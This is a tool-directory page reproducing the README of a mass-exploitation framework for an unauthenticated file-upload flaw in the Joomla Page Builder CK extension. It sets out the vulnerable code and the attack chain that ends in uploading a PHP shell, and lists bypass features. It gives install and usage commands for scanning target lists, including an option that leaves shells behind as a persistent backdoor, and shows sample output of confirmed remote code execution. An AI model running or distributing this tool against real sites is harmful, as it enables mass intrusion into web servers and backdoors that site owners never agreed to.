Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
pbck-exploit — 📤 Mass exploitation framework for CVE-2026-56290 — Page Builder CK Joomla unauthenticated file upload to RCE | Kitploit
Tools/GitHubGitHub/shinthink/pbck-exploit
ReconnaissanceVulnerability ScannersExploit FrameworksWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubshinthink/pbck-exploit

pbck-exploit

📤 Mass exploitation framework for CVE-2026-56290 — Page Builder CK Joomla unauthenticated file upload to RCE

View Repository
3152 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

PBCK-Exploit — CVE-2026-56290 Joomla Page Builder CK Exploit

Python CVE License

Discovery CSRF RCE Cleanup Live

Mass Exploitation & Validation Framework for Joomla Page Builder CK

Unauthenticated Arbitrary File Upload → Remote Code Execution



📑 Table of Contents

  • Vulnerability Overview
  • Affected Versions
  • Features
  • Installation
  • Usage
  • Proof of Concept
  • Technical Deep-Dive
  • Detection Methodology
  • Defense & Mitigation
  • Disclaimer
  • References

🔴 Vulnerability Overview

CVE-2026-56290 is a critical-severity vulnerability in Page Builder CK (com_pagebuilderck), a popular Joomla page builder extension. The browse.ajaxAddPicture controller method accepts unauthenticated file uploads with a user-controlled destination path, allowing attackers to write arbitrary PHP files to web-accessible directories.

The Root Cause

// browse.php controller — NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

The path parameter undergoes only trim() sanitization — no whitelist, no directory traversal check, no authentication gate. Combined with a CSRF token that is publicly accessible from any Joomla page, attackers can remotely upload PHP shells to any writable directory.

Impact

VectorSeverityImpact
Unauthenticated File Upload9.8 (Critical)Arbitrary PHP code execution
CSRF Token Harvesting5.3 (Medium)Enables the upload chain
Information Disclosure5.3 (Medium)Extension version fingerprinting

The Attack Chain

1. HIT Joomla homepage     →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs

🟠 Affected Versions

Page Builder CK VersionStatusNotes
3.1.1 and below🔴 VulnerableConfirmed unauthenticated upload
3.4.10 and below🔴 VulnerableExtended range per analysis
3.5.10 and below🔴 VulnerableSome patched variants may exist
> 3.5.10🟢 Possibly PatchedVerify via manifest XML

Note: Version is detected from the Joomla manifest file at /administrator/manifests/files/com_pagebuilderck.xml. If the manifest is inaccessible, the scanner defaults to treating the target as potentially vulnerable.


✨ Features

🔍 Reconnaissance

  • Joomla detection — 2-phase: HTML fingerprints + admin panel probe
  • PBCK detection — Direct path probes + HTML pattern matching
  • Version extraction — Manifest XML parsing + HTML regex fallback
  • CSRF token harvesting — Multi-page token extraction (home, login, registration, admin)
  • Endpoint brute-forcing — 1000+ task/param/path combos with time-budgeted discovery

💀 Exploitation

  • 40+ extension bypass — Case juggling, numbered variants, double extensions, Windows tricks
  • 20+ destination paths — Extension dirs, Joomla writable dirs, traversal paths
  • Shell validation — Token-based confirmation that PHP executes
  • Auto-cleanup — Shells self-destruct after validation (?cleanup=1)
  • Live TXT output — Real-time thread-safe results written to file
  • JSON report — Structured report with full per-target details

📦 Installation

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

Requirements

requests>=2.28.0
urllib3>=1.26.0

📖 Usage

Command Line Arguments

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

Basic Usage

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

Target File Format

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

🧪 Proof of Concept

Scenario 1: Mass Scan with Live Output

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
────────────────────────────────────────────────────────────

  ✅ https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  🛡️ https://target-patched.com  [patched]  3.2s
Download Tool